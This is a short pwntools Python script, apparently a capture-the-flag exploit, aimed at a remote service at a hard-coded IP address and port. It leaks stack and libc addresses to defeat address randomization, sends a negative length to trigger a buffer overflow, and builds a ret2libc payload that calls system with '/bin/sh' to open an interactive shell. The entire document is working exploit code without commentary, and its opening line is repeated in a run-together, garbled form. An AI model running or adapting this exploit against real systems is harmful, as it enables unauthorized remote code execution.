#!/usr/bin/env python# -*- coding: utf-8 -*-from pwn import * host

1. #!/usr/bin/env python
2. # -*- coding: utf-8 -*-
3. from pwn import *
4.  
5.  
6. host = "35.198.98.140"
7. port = 45067
8.  
9. libc=ELF('./libc.so.6')
10. p = remote(host,port)
11.  
12. offset=libc.symbols['setbuffer']
13. system_off=libc.symbols['system']
14. sh_offset=0x015cd48
15.  
16. p.recvuntil(":")
17. p.send('a'*15+'b')
18. p.recvuntil('ab')
19. data=p.recvuntil("Enter length: ")[:-14]
20. buff_adr=int(enhex(data[:4][::-1]),16)
21. setbuffer_addr=int(enhex(data[-4:][::-1]),16)-11
22. print "buffer"
23. print hex(buff_adr)
24. libc_base=setbuffer_addr-offset
25. sh=libc_base+sh_offset
26. print "libc_base"
27. print hex(libc_base)
28. print "system"
29. print hex(libc_base+system_off)
30. print "/bin/sh"
31. print hex(sh)
32. p.sendline("-1")
33. print p.recvuntil(":")
34.  
35.  
36. payload="a"*80+p32(buff_adr+0x10)+28*"a"+p32(libc_base+system_off)+p32(sh)*10
37. p.sendline(payload)
38. p.interactive()